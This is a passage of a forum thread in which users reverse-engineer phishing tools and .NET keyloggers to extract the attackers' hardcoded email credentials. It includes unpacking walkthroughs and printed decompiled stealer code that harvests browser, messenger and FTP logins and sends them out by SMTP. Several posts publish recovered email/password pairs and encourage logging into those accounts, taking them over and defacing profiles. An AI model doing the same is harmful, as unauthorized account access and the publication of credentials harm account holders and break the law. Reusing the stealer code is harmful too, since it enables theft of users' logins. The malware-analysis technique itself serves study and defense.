1. Post #241
    Gold Member
    ShaunOfTheLive's Avatar
    November 2007
    9,903 Posts
    Ahh, okay, I allways changed to dll because was still a binary format that .net used, I may just change to some random extention from now on then.
    Just remove the extension altogether. Then you can pretend you're on Linux.
    Reply With Quote Edit / Delete Reply Windows 7 Canada Show Events Funny Funny x 13 (list)

  2. Post #242
    ..............
    nekosune's Avatar
    February 2009
    1,827 Posts
    Just remove the extension altogether. Then you can pretend you're on Linux.
    That tends to get annoying when windows constantly asks what you want to open it with, I am going to make an extention like .refl and tell it to open any files with that in reflector.
    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Winner Winner x 2 (list)

  3. Post #243
    Gold Member
    Darwin226's Avatar
    January 2009
    4,158 Posts
    That tends to get annoying when windows constantly asks what you want to open it with, I am going to make an extention like .refl and tell it to open any files with that in reflector.
    What was wrong with renaming it to dll?

  4. Post #244
    ..............
    nekosune's Avatar
    February 2009
    1,827 Posts
    What was wrong with renaming it to dll?
    I just realised that if I rename it .refl, and reassosiate, it means I can start reflector on the right project in one go, rather then loading it seperatly, just a minor 1 minuite timesaver.
    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Winner Winner x 4 (list)

  5. Post #245
    newbs's Avatar
    December 2007
    634 Posts
    Sorry to bump an old thread, but I just found this.

    One of the guys stored his creds in plaintext. The other guy used a obfuscator which made it a bit harder but I figured it out. ;)

    I shut down both of their accounts.

    I used ILSpy for my de-compiler and de4dot for my de-obfuscator.

    This was really fun to do and I learned a bit along the way.

    Here's a link to the files if anyone's interested:
    http://www.sendspace.com/file/deasxe

    RSMemershipGenerator
    Username: [spoiler]Bapsigste@gmail.com[/spoiler]
    Password: [spoiler]hallo1233[/spoiler]

    Runescape membership hack v12.3
    Username: [spoiler]stuurhaan01@gmail.com[/spoiler]
    Password: [spoiler]tjoban123[/spoiler]

    As far as I could tell there is no backdoor. It's just a phishing scam.
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Winner Winner x 2 (list)

  6. Post #246
    Voted WORST Gold Member 2012
    Killuah's Avatar
    August 2005
    15,760 Posts
    Ok hi.

    I was linked here by a news thread and thought I'd give it a try.

    So I tried to get something from
    https://www.youtube.com/watch?v=w1dp9RoXhnU

    Lucky me, it triggers MSE and apparently it contains some sort of backdoor thingie?

    Just where do you guys find this stuff and how do you check if it's a VP project?
    Reply With Quote Edit / Delete Reply Windows 7 Germany Show Events Dumb Dumb x 9 (list)

  7. Post #247
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Ok hi.

    I was linked here by a news thread and thought I'd give it a try.

    So I tried to get something from
    https://www.youtube.com/watch?v=w1dp9RoXhnU

    Lucky me, it triggers MSE and apparently it contains some sort of backdoor thingie?

    Just where do you guys find this stuff and how do you check if it's a VP project?
    Let's do a walkthrough.

    First, you'll need ILSpy. Open up the EXE with that. In the case of this EXE, you'll get the error "This file does not contain a managed assembly." This means that the file is not a .NET application.

    The next step, for this program, is to open it up in 7zip. Sometimes this'll work. In this case, you'll see this:


    This means that the executable is packed with UPX. You can also check this with something like PEiD.

    Chances are, the EXE was packed with an older version of UPX. This means it's harder to uncompress, since the built in UPX decompressor won't do it. That means we'll have to use OllyDbg to uncompress this file. It's a little complex, but you should be able to figure it out with this tutorial: http://securityxploded.com/unpackingupx.php

    After you've done that, try opening up the unpacked EXE in ILSpy. It still doesn't work! Why? If you open up the EXE in notepad++, you'll notice two things:


    The first one, that I've circled, is the MZ header. All EXE files begin with MZ. This tells us that we have, in fact, unpacked this correctly. The second thing you'll notice is the TObject and other underlined names. TObject is an object in Delphi. This means two things: that we can't decompile this, and it's probably a RAT.

    But that's no fair; we didn't get to see how you unpack .NET keyloggers. Let's take a look at one I have in my folder (I keep a folder of all the keyloggers I download). If you open this one up (I won't share the file, it's still malicious), you'd notice that it did, in fact, open up in ILSpy:


    Alright, now we need to go to the Form1 class. You'll want to look around the button click events until you find one that looks like this:


    Congrats, you've just whaled a keylogger! Unfortunately, that was a really boring one. Let's try a harder one.

    If you were to open this one up, you'd notice this:


    C# and VB support putting tons of weird characters into class names. This makes obfuscation a lot easier. Let's go to Module1.


    Now, this is a Project Neptune keylogger (as you can see on the bottom). It supports FTP and email, but no one uses FTP. Two of those variables under "smtp.gmail.com" are the email and password. They're encrypted though. Let's open up this exe in Visual Studio (you can export a project with ILSpy under the File menu).

    The most useful tools you'll use in Visual Studio for this type of thing is Find All References and Go to Definition. This pretty much negates obfuscation. If you go to the "smtp.gmail.com" variable, right click, and find all references, you'll see that it goes into a SendEmail function.


    Thanks to Intellisense, we can find out what variables are the username and password - in this case, Module1.μνΩΟηχΩωγ and Module1.ΧΦΦικΗΥκβ. However, at some point along the line, these variables must've been decrypted. Let's find all references again.


    Here we can see that the username and password are being assigned to - by a decryption function. We can also see that the key is the last parameter. With this info, we can put the decryption function in another project and run it to decrypt the email and password.


    Now, we run this, and check the contents of out.txt. In this case, the contents are:
    Code:
    User: metriek1@gmail.com - Pass: keylogger1
    So, you log into that account, and do what you want. You'll want to change the recovery email and the password, which both stops the "hacker" from logging in and stops keylogger logs from being sent. You can also spice up their Google+ profile:



    (That's not the original picture of the "hacker", it's an inside joke)
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Winner Winner x 16Funny Funny x 5Programming King Programming King x 4Useful Useful x 1 (list)

  8. Post #248
    Jaykin Bacon: Episode 3
    SteveUK's Avatar
    May 2005
    2,469 Posts
    BBC News had an article about this sort of thing today: http://www.bbc.co.uk/news/technology-21371609

    Most of these seem to be using the same trick in that it just sends data to an email address which is hardcoded.
    Reply With Quote Edit / Delete Reply Windows 8 United Kingdom Show Events Funny Funny x 1Agree Agree x 1 (list)

  9. Post #249
    Gold Member
    Lone Wolf807's Avatar
    July 2007
    3,245 Posts
    What of something like this?



    So while I was attempting to unpack a UPX my Mbam quarantined a file, I thought only using a .exe opens up files?

  10. Post #250
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    What of something like this?



    So while I was attempting to unpack a UPX my Mbam quarantined a file, I thought only using a .exe opens up files?
    It's realizing that the file you're trying to read is a virus. It doesn't mean it will execute it.

    And for something like that, that means that it's a regular compiled file (C++, Delphi, Assembly, etc)
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Agree Agree x 2Informative Informative x 1 (list)

  11. Post #251
    King of the Oil Refinery
    Tobba's Avatar
    December 2008
    6,229 Posts
    Trying to figure out Project Neptune

    The credentials are base64 encoded, but they're not decoded anywhere and decoded its gibberish
    I'm guessing NetworkCredentials decodes them somehow but I have no idea how

  12. Post #252
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Trying to figure out Project Neptune

    The credentials are base64 encoded, but they're not decoded anywhere and decoded its gibberish
    I'm guessing NetworkCredentials decodes them somehow but I have no idea how
    They're decoded like this:
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Agree Agree x 1 (list)

  13. Post #253
    HeatPipe's Avatar
    October 2007
    1,574 Posts
    Triple encrypted?

  14. Post #254
    Kamshak's Avatar
    July 2008
    438 Posts
    snip missed 5 pages

  15. Post #255
    Gold Member
    Neo Kabuto's Avatar
    November 2008
    5,641 Posts
    Triple encrypted?
    It's an attempt to make it more annoying to get around, but it's still really easy.

  16. Post #256
    Gold Member
    TheCreeper's Avatar
    April 2012
    703 Posts
    Now, we run this, and check the contents of out.txt. In this case, the contents are:
    Code:
    User: metriek1@gmail.com - Pass: keylogger1
    So, you log into that account, and do what you want. You'll want to change the recovery email and the password, which both stops the "hacker" from logging in and stops keylogger logs from being sent. You can also spice up their Google+ profile:



    (That's not the original picture of the "hacker", it's an inside joke)
    I've decompiled and decrypted the same keylogger as you and only later did I realise that the username & password is in your post.

    Reply With Quote Edit / Delete Reply Windows 7 United Kingdom Show Events Funny Funny x 9 (list)

  17. Post #257
    Gold Member
    Neo Kabuto's Avatar
    November 2008
    5,641 Posts
    I've decompiled and decrypted the same keylogger as you and only later did I realise that the username & password is in your post.
    Weird that it still worked, though, since he was talking about changing the password to lock the script kiddie out of his account.

  18. Post #258

    January 2012
    421 Posts
    Weird that it still worked, though, since he was talking about changing the password to lock the script kiddie out of his account.
    Doesn't look like he's logged in, so the password would be different, but the email remains.
    Reply With Quote Edit / Delete Reply Windows 8 Canada Show Events Disagree Disagree x 1 (list)

  19. Post #259
    Gold Member
    Neo Kabuto's Avatar
    November 2008
    5,641 Posts
    Doesn't look like he's logged in, so the password would be different, but the email remains.
    Looks like he's logged in to me. He has options to fill out the profile and post statuses/updates/whatever G+ calls them as that guy.

  20. Post #260
    PENISCORP DIRECTOR
    Gran PC's Avatar
    August 2007
    3,114 Posts
    I talked to some lovely guy on that account before
    Reply With Quote Edit / Delete Reply Windows 7 Spain Show Events Funny Funny x 1Optimistic Optimistic x 1 (list)

  21. Post #261
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Weird that it still worked, though, since he was talking about changing the password to lock the script kiddie out of his account.
    I forgot to change the password
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Winner Winner x 1Funny Funny x 1 (list)

  22. Post #262
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts


    ugggggh, several hours of work to be met by this. Beaten to the punch.

    Edited:



    It was still an interesting and fun challenge, hopefully I'll find time to do a writeup.
    Reply With Quote Edit / Delete Reply Windows 8 United States Show Events Funny Funny x 4Informative Informative x 1 (list)

  23. Post #263
    Gold Member
    Neo Kabuto's Avatar
    November 2008
    5,641 Posts


    ugggggh, several hours of work to be met by this. Beaten to the punch.
    I know that feeling. Still, at least you know it's down?
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Agree Agree x 2 (list)

  24. Post #264
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts
    It was still an interesting and fun challenge, hopefully I'll find time to do a writeup.
    The first part of that is out now
    Reply With Quote Edit / Delete Reply Windows 8 United States Show Events Useful Useful x 1 (list)

  25. Post #265
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts

  26. Post #266
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    I think it's time to introduce a very useful application, Simple Assembly Explorer.

    SAE is a bunch of useful programs wrapped into one. Its most useful function is the class editor, which allows you to edit programs without converting them back into C# or VB. Let's open up another old keylogger:


    As you can easily see in this image, this assembly is packing some encrypted data. We could save this and rip the decryption function out to get the decrypted data, but that's no fun. Let's do the fun way.

    This assembly is obfuscated with a bunch of awful variable and function names:


    Let's use the deobfuscator function of SAE to make this easier to read. Open up SAE, right click on the EXE, and choose "Deobfuscator":


    You don't need to worry about any of this. Once it's done, you can see the difference.


    It's not great, but this can be very useful, especially with unprintable or Chinese characters for names.

    You don't need to use ILSpy from this point on; SAE has the ability to view the assembly in C# (using ILSpy, actually). In the Main function of this assembly, it calls a few functions:


    As far as I can tell, the line c000003.m000004("217") is the one that runs the application, using the data decrypted from the line before it. Let's check out m000004.


    To extract the application, we'll need to edit the IL code directly. Switch over to the details tab, where you'll see something like this:


    This is the code that C# and VB compile into. It's very different, but you can either Google for tutorials or pick it up as you go. As far as this tutorial goes, we won't need to know much. First, we'll need to remove the current functions that are called. Remove everywhere from line 4 to 12.

    Right now, what this code does is check if argument one of the function (ldarg.0) and string.Empty (ldsfld) are equal (call op_Inequality). If they aren't (brfalse.s), the code will continue, else it will jump to whatever brfalse.s is set to (the ret statement). Right click on brfalse.s and click "insert after".


    In the opcode box, type "call". In the operand box, click the browse button (...). Click open in the top left, click "Open GAC", and open the "mscorlib" namespace. Open up the "System.IO" namespace under System, then the File class under that, then finally on the WriteAllBytes function. Click Select (top left).

    We'll need two arguments for WriteAllBytes - the file name and the byte array. The ldstr opcode takes care of one of them - insert that now - and the other can be loaded with ldsfld. Insert that too - with the f00000a variable. Your IL should look something like this now:


    Finally, save the assembly. Open it again and check the function out in ILSpy to make sure it's going to work.


    Finally, run the edited exe. You may be wondering "Why would I ever run a virus?", but we have, in theory, removed the virus part of the application. Obviously, you should be as careful as possible. When you run it, you should get the file outputted back. If you open it in ILSpy, you'll see this:


    And here we go again...
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Useful Useful x 3Informative Informative x 1 (list)

  27. Post #267
    SirCrest is my life, so is yours.
    Goz3rr's Avatar
    October 2009
    7,456 Posts
    Man, all the ones i manage to decrypt had their password changed less than a week ago :c

    Edited:

    Is there an easy way to extract the .NET installer things, because i don't feel like installing it to get the executable.
    Reply With Quote Edit / Delete Reply Windows 7 Netherlands Show Events Friendly Friendly x 3 (list)

  28. Post #268
    aurum481's Avatar
    November 2008
    2,519 Posts
    That was an interesting read. Will you put up other parts?

  29. Post #269
    Pery's Avatar
    October 2008
    446 Posts
    I've found a quite nasty one. Steals your MSN, Chrome, Firefox, IE, FileZilla, imvu, no-ip, Pidgin and Steam and Windows key. Still cracking through this one but I've found out it's called iRtehStealer.

    Here's a snippet:
    Code:
    public object method_42(string string_8, string string_9, string string_10, string string_11)    {
            object obj = null;
            try
            {
                MailMessage mailMessage = new MailMessage();
                mailMessage.From = new MailAddress(string_8);
                mailMessage.To.Add(string_8);
                mailMessage.Subject = string.Concat("iRtehStealer:STEAL:", Class9.smethod_0().Name);
                mailMessage.Body = this.vmethod_24().Text;
                SmtpClient smtpClient = new SmtpClient(string_10);
                smtpClient.Port = Conversions.ToInteger(string_11);
                smtpClient.Credentials = new NetworkCredential(string_8, string_9);
                smtpClient.EnableSsl = true;
                smtpClient.Send(mailMessage);
            }
            catch (Exception exception1)
            {
                Exception exception = exception1;
                ProjectData.SetProjectError(exception);
                ProjectData.ClearProjectError();
            }
            return obj;
        }
    And another:
    Code:
       public void method_41()    {
            string[] text = new string[21];
            text[0] = "=========PC Information=========\r\n";
            text[1] = this.vmethod_10().Text;
            text[2] = "\r\n\r\n=========MSN Steal=========\r\n";
            text[3] = this.vmethod_6().Text;
            text[4] = "\r\n=========Chrome Steal=========\r\n";
            text[5] = this.vmethod_2().Text;
            text[6] = "\r\n=========Firefox Steal=========\r\n";
            text[7] = this.vmethod_0().Text;
            text[8] = "\r\n=========Internet Explorer Steal=========\r\n";
            text[9] = this.vmethod_4().Text;
            text[10] = "\r\n=========FileZilla Steal=========\r\n";
            text[11] = this.vmethod_8().Text;
            text[12] = "\r\n\r\n=========IMVU Steal=========\r\n";
            text[13] = this.vmethod_12().Text;
            text[14] = "\r\n\r\n=========No-IP Steal=========\r\n";
            text[15] = this.vmethod_14().Text;
            text[16] = "\r\n\r\n=========Pidgin Steal=========\r\n";
            text[17] = this.vmethod_18().Text;
            text[18] = "\r\n\r\n=========Windows Key=========\r\n";
            text[19] = this.vmethod_16().Text;
            text[20] = "\r\n\r\n";
            this.vmethod_24().Text = string.Concat(text);
            string str = string.Concat(Interaction.Environ("tmp"), "\\TMP.dat");
            if (File.Exists(str))
            {
                try
                {
                    StreamReader streamReader = new StreamReader(str);
                    string end = streamReader.ReadToEnd();
                    this.vmethod_50().Text = end;
                    this.vmethod_24().Text = string.Concat(this.vmethod_24().Text, "=========CD-Key Steal=========\r\n", this.vmethod_50().Text);
                }
                catch (Exception exception)
                {
                    ProjectData.SetProjectError(exception);
                    ProjectData.ClearProjectError();
                }
            }
        }

  30. Post #270
    itty-bitty pretty kitty
    Dennab
    September 2008
    9,837 Posts
    Is there an easy way to extract the .NET installer things, because i don't feel like installing it to get the executable.
    Things like Setup.exe? I'll look into it. I've seen tons of those but I've never checked them out.

    Edited:

    By the way, quick way to whale unknown loggers.

    If you see something like this:


    It's an unknown logger. Don't bother digging through the code to find the password, because it's not in there. Open the file up in Notepad++ (Notepad won't cut it, Sublime Text 2 renders it as hex), and search for "Unknown Logger". You'll find this:


    First is the email, second is the password. It seems someone likes Breaking Bad:
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Informative Informative x 3Winner Winner x 2 (list)

  31. Post #271
    a.k.a compwhizii
    Dennab
    December 2012
    96 Posts
    That was an interesting read. Will you put up other parts?
    Eventually, I still need to write them :v

    I'll try to find some time tonight as I have off from school.

  32. Post #272
    I made WAYWO a better place
    OldFusion's Avatar
    September 2011
    1,311 Posts
    Man, all the ones i manage to decrypt had their password changed less than a week ago :c

    Edited:

    Is there an easy way to extract the .NET installer things, because i don't feel like installing it to get the executable.
    http://en.wikipedia.org/wiki/Cabinet_(file_format)

    7zip unpacks them just fine.
    Reply With Quote Edit / Delete Reply Windows 7 United States Show Events Agree Agree x 1Useful Useful x 1 (list)

  33. Post #273
    SirCrest is my life, so is yours.
    Goz3rr's Avatar
    October 2009
    7,456 Posts
    Pretty sure i tried that, said it was an unsupported filetype, do you need to rename it to .cab for it to work?

  34. Post #274
    helifreak's Avatar
    May 2011
    653 Posts
    But they aren't cab files, even the cabinet sdk extract.exe cant open them.

  35. Post #275
    Se1f_Distruct's Avatar
    April 2011
    633 Posts
    If you know for a fact that the keylogger sends an initial 'infected' email back home and runs on the .NET framework, you can simply get the password by running it sandboxed and logging the API calls with a profiler.

    Look for a NetworkCredentials constructor. It's always fucking there.

  36. Post #276

    February 2014
    1 Posts
    What of something like this?



    So while I was attempting to unpack a UPX my Mbam quarantined a file, I thought only using a .exe opens up files?

    Hi
    This is not related to a keylogger but to decompiling a freeware . (which is not an assembly)
    So I viewed the package with 7zip. I got the same first 4 files in the image.
    How to proceed from there?

    I tried in SAE, but is not an assembly.
    NP++ gives MZ header.

    The freeware is: myquotes.exe found here - www.volumedigger.com/Software/myQuotes.aspx.
    The issue that I m trying to correct is that it doesn't log on to yahoo server. Says "Failed to login to yahoo." with admin settings in win 7.

    It says its built on .net framework and i think C++ visual. I don't have much idea of coding, so its just a guess.
    Looking at the images in the post, i thought it might be easier to fix in VS 2012. So I am just taking a shot..

    Any help, guidance is much appreciated.
    Reply With Quote Edit / Delete Reply Windows 7 India Show Events Dumb Dumb x 4 (list)

  37. Post #277
    Tamschi's Avatar
    December 2009
    3,615 Posts
    Hi
    This is not related to a keylogger but to decompiling a freeware . (which is not an assembly)
    So I viewed the package with 7zip. I got the same first 4 files in the image.
    How to proceed from there?

    I tried in SAE, but is not an assembly.
    NP++ gives MZ header.

    The freeware is: myquotes.exe found here - www.volumedigger.com/Software/myQuotes.aspx.
    The issue that I m trying to correct is that it doesn't log on to yahoo server. Says "Failed to login to yahoo." with admin settings in win 7.

    It says its built on .net framework and i think C++ visual. I don't have much idea of coding, so its just a guess.
    Looking at the images in the post, i thought it might be easier to fix in VS 2012. So I am just taking a shot..

    Any help, guidance is much appreciated.
    If you get those files it means it's a native executable, i.e. you can't really decompile it.

    You might be able to debug it though, but you will never get a reasonable source code in less time than it would take you to copy the whole thing from scratch.

    (Hint: Sniff the network connections, that will tell you how to request the data from Yahoo at least.
    If it's encrypted/TLS you need to use an active proxy though.)

  38. Post #278
    Ott
    Gold Member
    Ott's Avatar
    June 2012
    2,538 Posts
    Changed his profile picture to goatse



    Changed his password, here's the new credentials if you want to have some fun.

    Code:
    -snip-
    Reply With Quote Edit / Delete Reply United States Show Events Funny Funny x 1 (list)

  39. Post #279
    I'm a tool
    KillerLUA's Avatar
    June 2009
    1,405 Posts
    Why don't these people just use a throwaway web server for storing keys? Is it the "recommended" thing in tutorials to use email?

    Doesn't seem to make any sense to me, and what use is collecting runescape/etc accounts anyways, how can you make money from that?

  40. Post #280
    Jaykin Bacon: Episode 3
    SteveUK's Avatar
    May 2005
    2,469 Posts
    Why don't these people just use a throwaway web server for storing keys? Is it the "recommended" thing in tutorials to use email?

    Doesn't seem to make any sense to me, and what use is collecting runescape/etc accounts anyways, how can you make money from that?
    These are made by kids who literally copy and paste code from tutorials. Do you really expect them to be doing anything more advanced than that?
    Reply With Quote Edit / Delete Reply United Kingdom Show Events Late Late x 1 (list)